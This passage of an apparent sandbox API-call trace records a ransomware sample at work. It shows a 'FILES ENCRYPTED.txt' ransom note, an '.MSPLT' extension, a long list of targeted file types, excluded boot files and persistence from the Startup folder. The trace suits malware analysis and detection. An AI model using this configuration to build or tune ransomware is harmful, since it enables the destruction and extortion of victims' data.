RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4d9230, Size=0x20) returned 0x4adb88 [0279.934] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4adb88, Size=0x40) returned 0x487748 [0279.934] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x487748, Size=0x80) returned 0x4b6078 [0279.934] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4ae118, Size=0x8) returned 0x4ae2c8 [0279.934] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4ae2c8, Size=0x10) returned 0x4d9350 [0279.934] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4d9350, Size=0x20) returned 0x4adbd8 [0279.934] lstrlenW (lpString="boot.ini;bootfont.bin;ntldr;ntdetect.com;io.sys;") returned 48 [0279.934] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4b6078 | out: hHeap=0x470000) returned 1 [0279.934] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4d9260, Size=0x20) returned 0x4ad980 [0279.934] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4ad980, Size=0x40) returned 0x487748 [0279.934] lstrlenW (lpString="FILES ENCRYPTED.txt") returned 19 [0279.934] lstrlenW (lpString="FILES ENCRYPTED.txt") returned 19 [0279.934] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x487748 | out: hHeap=0x470000) returned 1 [0279.934] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4d92c0, Size=0x20) returned 0x4ad9d0 [0279.934] lstrlenW (lpString="Info.hta") returned 8 [0279.934] lstrlenW (lpString="Info.hta") returned 8 [0279.934] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4ad9d0 | out: hHeap=0x470000) returned 1 [0279.934] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4d93c0, nSize=0x7fff | out: lpFilename="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\wdgmug.exe" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\wdgmug.exe")) returned 0x47 [0279.934] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4d93c0 | out: hHeap=0x470000) returned 1 [0279.934] lstrlenW (lpString="wdgmug.exe") returned 10 [0279.934] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4adbd8, Size=0x40) returned 0x487748 [0279.935] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4d9260, Size=0x20) returned 0x4ad930 [0279.935] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4d92f0, Size=0x20) returned 0x4adc28 [0279.935] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4adc28, Size=0x40) returned 0x4877d8 [0279.935] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4877d8, Size=0x80) returned 0x4b55d8 [0279.935] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4b55d8, Size=0x100) returned 0x4f9710 [0279.935] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0279.935] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4f9710 | out: hHeap=0x470000) returned 1 [0279.935] ExpandEnvironmentStringsW (in: lpSrc="%windir%;", lpDst=0x4d93c0, nSize=0x8000 | out: lpDst="C:\\WINDOWS;") returned 0xc [0279.935] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4e93c8 | out: hHeap=0x470000) returned 1 [0279.936] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4d93c0 | out: hHeap=0x470000) returned 1 [0279.936] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4ae428, Size=0x8) returned 0x4ae3b8 [0279.936] lstrlenW (lpString="%windir%;") returned 9 [0279.937] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4ad930 | out: hHeap=0x470000) returned 1 [0279.937] lstrlenW (lpString="C:\\WINDOWS;") returned 11 [0279.937] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4c6f90 | out: hHeap=0x470000) returned 1 [0279.937] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4d9320, Size=0x20) returned 0x4adc78 [0279.937] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4adc78, Size=0x40) returned 0x487aa8 [0279.937] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x487aa8, Size=0x80) returned 0x4b6100 [0279.937] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4b6100, Size=0x100) returned 0x4fa058 [0279.937] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4ae448, Size=0x8) returned 0x4ae3c8 [0279.937] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4ae3c8, Size=0x10) returned 0x4d9320 [0279.937] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4d9320, Size=0x20) returned 0x4ad930 [0279.937] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4ae2d8, Size=0x8) returned 0x4ae408 [0279.937] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4ae438, Size=0x8) returned 0x4ae3c8 [0279.937] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4ae448, Size=0x8) returned 0x4ae438 [0279.937] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4ae438, Size=0x10) returned 0x4d8ea0 [0279.937] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4d8ea0, Size=0x20) returned 0x4ada20 [0279.937] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4ae408, Size=0x10) returned 0x4d8d38 [0279.937] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4ae3c8, Size=0x10) returned 0x4d8d08 [0279.938] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4ae448, Size=0x8) returned 0x4ae3c8 [0279.938] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4ae368, Size=0x8) returned 0x4ae2a8 [0279.938] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4d8d38, Size=0x20) returned 0x4ad8b8 [0279.938] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4d8d08, Size=0x20) returned 0x4adc78 [0279.938] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4ae3d8, Size=0x8) returned 0x4ae408 [0279.938] lstrlenW (lpString="doc(.doc;.docx;.pdf;.xls;.xlsx;.ppt;)arc(.zip;.rar;.bz2;.7z;)dbf(.dbf;)1c8(.1cd;)jpg(.jpg;)") returned 91 [0279.938] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4fa058 | out: hHeap=0x470000) returned 1 [0279.938] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4d8cd8, Size=0x20) returned 0x4ad958 [0279.938] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%", lpDst=0x4c6f90, nSize=0x7fff | out: lpDst="C:") returned 0x3 [0279.938] lstrlenW (lpString="C:\\") returned 3 [0279.939] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x19fca4, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x19fca4*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0279.939] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4c6f90 | out: hHeap=0x470000) returned 1 [0279.940] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4ae428, Size=0x82) returned 0x4b6a90 [0279.940] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4ae448, Size=0x100) returned 0x4f9c38 [0279.940] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4b6a90, Size=0x104) returned 0x4b6c40 [0279.940] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4b6b20, Size=0x104) returned 0x4d77a0 [0279.940] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4b5c38, Size=0x100) returned 0x4f9d40 [0279.940] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4f9c38, Size=0x200) returned 0x4d78b0 [0279.941] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4ae438 | out: hHeap=0x470000) returned 1 [0279.941] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4d78b0 | out: hHeap=0x470000) returned 1 [0279.941] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4d8ea0 | out: hHeap=0x470000) returned 1 [0279.942] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4b5e58 | out: hHeap=0x470000) returned 1 [0279.942] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4d8d38 | out: hHeap=0x470000) returned 1 [0279.942] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4b5cc0 | out: hHeap=0x470000) returned 1 [0279.942] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4d8d50 | out: hHeap=0x470000) returned 1 [0279.942] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4b6c40 | out: hHeap=0x470000) returned 1 [0279.942] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4d8de0 | out: hHeap=0x470000) returned 1 [0279.942] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4d77a0 | out: hHeap=0x470000) returned 1 [0279.942] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4d8ca8 | out: hHeap=0x470000) returned 1 [0279.942] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4b6bb0 | out: hHeap=0x470000) returned 1 [0279.942] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4d8dc8 | out: hHeap=0x470000) returned 1 [0279.942] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4d8dc8, Size=0x20) returned 0x4ad9d0 [0279.942] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4ad9d0, Size=0x40) returned 0x4877d8 [0279.942] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4ae3a8 | out: hHeap=0x470000) returned 1 [0279.942] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4d8d08 | out: hHeap=0x470000) returned 1 [0279.942] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4b3ee0 | out: hHeap=0x470000) returned 1 [0279.942] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4d8cd8 | out: hHeap=0x470000) returned 1 [0279.942] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4f9d40 | out: hHeap=0x470000) returned 1 [0279.942] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4d8d98 | out: hHeap=0x470000) returned 1 [0279.942] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4ae2b8 | out: hHeap=0x470000) returned 1 [0279.942] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4d8e70 | out: hHeap=0x470000) returned 1 [0279.942] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x485400 | out: hHeap=0x470000) returned 1 [0279.942] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x486390 | out: hHeap=0x470000) returned 1 [0279.942] lstrlenW (lpString="%systemdrive%") returned 13 [0279.942] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4ad958 | out: hHeap=0x470000) returned 1 [0279.942] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4b5990 | out: hHeap=0x470000) returned 1 [0279.942] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4ae418 | out: hHeap=0x470000) returned 1 [0279.943] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4091f0, lpParameter=0x4b6f70, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x260 [0279.944] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4d8e10, Size=0x20) returned 0x4ada98 [0279.944] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4ada98, Size=0x40) returned 0x4879d0 [0279.944] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4879d0, Size=0x80) returned 0x4b54c8 [0279.944] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4b54c8, Size=0x100) returned 0x4fa268 [0279.944] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4fa268, Size=0x200) returned 0x4b6a90 [0279.944] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4b6a90, Size=0x400) returned 0x4d77a0 [0279.944] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4d77a0, Size=0x800) returned 0x4fa3d8 [0279.944] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4fa3d8, Size=0x1000) returned 0x4c8f98 [0279.945] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4ae418, Size=0x8) returned 0x4ae338 [0279.945] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4ae338, Size=0x10) returned 0x4d8ea0 [0279.945] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4d8ea0, Size=0x20) returned 0x4adbd8 [0279.945] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4adbd8, Size=0x40) returned 0x487868 [0279.945] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x487868, Size=0x80) returned 0x4b54c8 [0279.945] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4b54c8, Size=0x100) returned 0x4f9500 [0279.945] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4f9500, Size=0x200) returned 0x4b6a90 [0279.945] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4b6a90, Size=0x400) returned 0x4d77a0 [0279.945] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4d77a0, Size=0x800) returned 0x4cafa8 [0279.945] lstrlenW (lpString=".1cd;.3ds;.3fr;.3g2;.3gp;.7z;.accda;.accdb;.accdc;.accde;.accdt;.accdw;.adb;.adp;.ai;.ai3;.ai4;.ai5;.ai6;.ai7;.ai8;.anim;.arw;.as;.asa;.asc;.ascx;.asm;.asmx;.asp;.aspx;.asr;.asx;.avi;.avs;.backup;.bak;.bay;.bd;.bin;.bmp;.bz2;.c;.cdr;.cer;.cf;.cfc;.cfm;.cfml;.cfu;.chm;.cin;.class;.clx;.config;.cpp;.cr2;.crt;.crw;.cs;.css;.csv;.cub;.dae;.dat;.db;.dbf;.dbx;.dc3;.dcm;.dcr;.der;.dib;.dic;.dif;.divx;.djvu;.dng;.doc;.docm;.docx;.dot;.dotm;.dotx;.dpx;.dqy;.dsn;.dt;.dtd;.dwg;.dwt;.dx;.dxf;.edml;.efd;.elf;.emf;.emz;.epf;.eps;.epsf;.epsp;.erf;.exr;.f4v;.fido;.flm;.flv;.frm;.fxg;.geo;.gif;.grs;.gz;.h;.hdr;.hpp;.hta;.htc;.htm;.html;.icb;.ics;.iff;.inc;.indd;.ini;.iqy;.j2c;.j2k;.java;.jp2;.jpc;.jpe;.jpeg;.jpf;.jpg;.jpx;.js;.jsf;.json;.jsp;.kdc;.kmz;.kwm;.lasso;.lbi;.lgf;.lgp;.log;.m1v;.m4a;.m4v;.max;.md;.mda;.mdb;.mde;.mdf;.mdw;.mef;.mft;.mfw;.mht;.mhtml;.mka;.mkidx;.mkv;.mos;.mov;.mp3;.mp4;.mpeg;.mpg;.mpv;.mrw;.msg;.mxl;.myd;.myi;.nef;.nrw;.obj;.odb;.odc;.odm;.odp;.ods;.oft;.one;.onepkg;.onetoc2;.opt;.oqy;.orf;.p12;.p7b;.p7c;.pam;.pbm;.pct;.pcx;.pdd;.pdf;.pdp;.pef;.pem;.pff;.pfm;.pfx;.pgm;.php;.php3;.php4;.php5;.phtml;.pict;.pl;.pls;.pm;.png;.pnm;.pot;.potm;.potx;.ppa;.ppam;.ppm;.pps;.ppsm;.ppt;.pptm;.pptx;.prn;.ps;.psb;.psd;.pst;.ptx;.pub;.pwm;.pxr;.py;.qt;.r3d;.raf;.rar;.raw;.rdf;.rgbe;.rle;.rqy;.rss;.rtf;.rw2;.rwl;.safe;.sct;.sdpx;.shtm;.shtml;.slk;.sln;.sql;.sr2;.srf;.srw;.ssi;.st;.stm;.svg;.svgz;.swf;.tab;.tar;.tbb;.tbi;.tbk;.tdi;.tga;.thmx;.tif;.tiff;.tld;.torrent;.tpl;.txt;.u3d;.udl;.uxdc;.vb;.vbs;.vcs;.vda;.vdr;.vdw;.vdx;.vrp;.vsd;.vss;.vst;.vsw;.vsx;.vtm;.vtml;.vtx;.wb2;.wav;.wbm;.wbmp;.wim;.wmf;.wml;.wmv;.wpd;.wps;.x3f;.xl;.xla;.xlam;.xlk;.xlm;.xls;.xlsb;.xlsm;.xlsx;.xlt;.xltm;.xltx;.xlw;.xml;.xps;.xsd;.xsf;.xsl;.xslt;.xsn;.xtp;.xtp2;.xyze;.xz;.zip;") returned 1776 [0279.945] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4c8f98 | out: hHeap=0x470000) returned 1 [0279.945] lstrlenW (lpString="") returned 0 [0279.945] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4ca7f0 | out: hHeap=0x470000) returned 1 [0279.945] lstrlenW (lpString=".MSPLT") returned 6 [0279.945] lstrlenW (lpString=".MSPLT") returned 6 [0279.945] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4ca7f0 | out: hHeap=0x470000) returned 1 [0279.945] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4ca820, Size=0x20) returned 0x4ad9f8 [0279.945] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4ad9f8, Size=0x40) returned 0x487868 [0279.945] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x487868, Size=0x80) returned 0x4b5908 [0279.946] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x50b7c8, Size=0x8) returned 0x50b658 [0279.946] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x50b658, Size=0x10) returned 0x4ca820 [0279.946] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4ca820, Size=0x20) returned 0x4ad9d0 [0279.946] lstrlenW (lpString="boot.ini;bootfont.bin;ntldr;ntdetect.com;io.sys;") returned 48 [0279.946] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4b5908 | out: hHeap=0x470000) returned 1 [0279.946] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4ca9e8, Size=0x20) returned 0x4ada98 [0279.946] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4ada98, Size=0x40) returned 0x487868 [0279.946] lstrlenW (lpString="FILES ENCRYPTED.txt") returned 19 [0279.946] lstrlenW (lpString="FILES ENCRYPTED.txt") returned 19 [0279.946] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x487868 | out: hHeap=0x470000) returned 1 [0279.946] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4cab80, Size=0x20) returned 0x4ada98 [0279.946] lstrlenW (lpString="Info.hta") returned 8 [0279.946] lstrlenW (lpString="Info.hta") returned 8 [0279.946] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4ada98 | out: hHeap=0x470000) returned 1 [0279.947] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x50b7f0, nSize=0x7fff | out: lpFilename="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\wdgmug.exe" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\wdgmug.exe")) returned 0x47 [0279.947] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x50b7f0 | out: hHeap=0x470000) returned 1 [0279.947] lstrlenW (lpString="wdgmug.exe") returned 10 [0279.947] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4ad9d0, Size=0x40) returned 0x4878f8 [0279.947] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4caa78, Size=0x20) returned 0x4ada98 [0279.947] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4ca988, Size=0x20) returned 0x4adc28 [0279.947] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4adc28, Size=0x40) returned 0x487868 [0279.947] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x487868, Size=0x80) returned 0x4b5880 [0279.947] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4b5880, Size=0x100) returned 0x4f9500 [0279.947] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0279.947] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4f9500 | out: hHeap=0x470000) returned 1 [0279.947] ExpandEnvironmentStringsW (in: lpSrc="%windir%;", lpDst=0x50b7f0, nSize=0x8000 | out: lpDst="C:\\WINDOWS;") returned 0xc [0279.947] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x51b7f8 | out: hHeap=0x470000) returned 1 [0279.948] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x50b7f0 | out: hHeap=0x470000) returned 1 [0279.949] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x50b768, Size=0x8) returned 0x50b6a8 [0279.949] lstrlenW (lpString="%windir%;") returned 9 [0279.949] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4ada98 | out: hHeap=0x470000) returned 1 [0279.950] lstrlenW (lpString="C:\\WINDOWS;") returned 11 [0279.950] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4fa3d8 | out: hHeap=0x470000) returned 1 [0279.950] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4caad8, Size=0x20) returned 0x4adb38 [0279.950] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4adb38, Size=0x40) returned 0x487868 [0279.950] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x487868, Size=0x80) returned 0x4b5550 [0279.950] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4b5550, Size=0x100) returned 0x4f9e48 [0279.950] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x50b768, Size=0x8) returned 0x50b6b8 [0279.950] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x50b6b8, Size=0x10) returned 0x4cab08 [0279.950] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4cab08, Size=0x20) returned 0x4ada98 [0279.950] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x50b658, Size=0x8) returned 0x50b708 [0279.950] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x50b698, Size=0x8) returned 0x50b798 [0279.950] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x50b698, Size=0x8) returned 0x50b6b8 [0279.950] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x50b6b8, Size=0x10) returned 0x4ca9e8 [0279.950] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4ca9e8, Size=0x20) returned 0x4adbd8 [0279.950] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x50b708, Size=0x10) returned 0x4ca8e0 [0279.950] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x50b798, Size=0x10) returned 0x4ca8f8 [0279.951] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x50b778, Size=0x8) returned 0x50b618 [0279.951] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x50b6c8, Size=0x8) returned 0x50b628 [0279.951] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4ca8e0, Size=0x20) returned 0x4adca0 [0279.951] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4ca8f8, Size=0x20) returned 0x4adb88 [0279.951] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x50b6c8, Size=0x8) returned 0x50b6e8 [0279.951] lstrlenW (lpString="doc(.doc;.docx;.pdf;.xls;.xlsx;.ppt;)arc(.zip;.rar;.bz2;.7z;)dbf(.dbf;)1c8(.1cd;)jpg(.jpg;)") returned 91 [0279.951] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4f9e48 | out: hHeap=0x470000) returned 1 [0279.951] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4caa00, Size=0x20) returned 0x4adac0 [0279.951] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%", lpDst=0x4fa3d8, nSize=0x7fff | out: lpDst="C:") returned 0x3 [0279.951] lstrlenW (lpString="C:\\") returned 3 [0279.951] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x19fca4, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x19fca4*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0279.952] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4fa3d8 | out: hHeap=0x470000) returned 1 [0279.953] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x50b728, Size=0x82) returned 0x4b6a90 [0279.953] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x50b788, Size=0x100) returned 0x4f93f8 [0279.953] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4b6a90, Size=0x104) returned 0x4b6c40 [0279.953] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4f93f8, Size=0x200) returned 0x4d77a0 [0279.954] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4b6b20, Size=0x104) returned 0x4d79a8 [0279.954] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4b52a8, Size=0x100) returned 0x4f9f50 [0279.954] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x50b778 | out: hHeap=0x470000) returned 1 [0279.955] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4d77a0 | out: hHeap=0x470000) returned 1 [0279.955] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4caad8 | out: hHeap=0x470000) returned 1 [0279.955] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4b5ee0 | out: hHeap=0x470000) returned 1 [0279.955] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4cabb0 | out: hHeap=0x470000) returned 1 [0279.955] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4b5d48 | out: hHeap=0x470000) returned 1 [0279.955] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4ca8e0 | out: hHeap=0x470000) returned 1 [0279.955] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4b6c40 | out: hHeap=0x470000) returned 1 [0280.101] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4caa00 | out: hHeap=0x470000) returned 1 [0280.101] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4d79a8 | out: hHeap=0x470000) returned 1 [0280.101] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4ca970 | out: hHeap=0x470000) returned 1 [0280.101] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4b6bb0 | out: hHeap=0x470000) returned 1 [0280.101] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4cab38 | out: hHeap=0x470000) returned 1 [0280.101] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4cc018, Size=0x20) returned 0x4add18 [0280.101] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4add18, Size=0x40) returned 0x4879d0 [0280.101] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x50b6c8 | out: hHeap=0x470000) returned 1 [0280.101] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4cab80 | out: hHeap=0x470000) returned 1 [0280.101] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4b3ee0 | out: 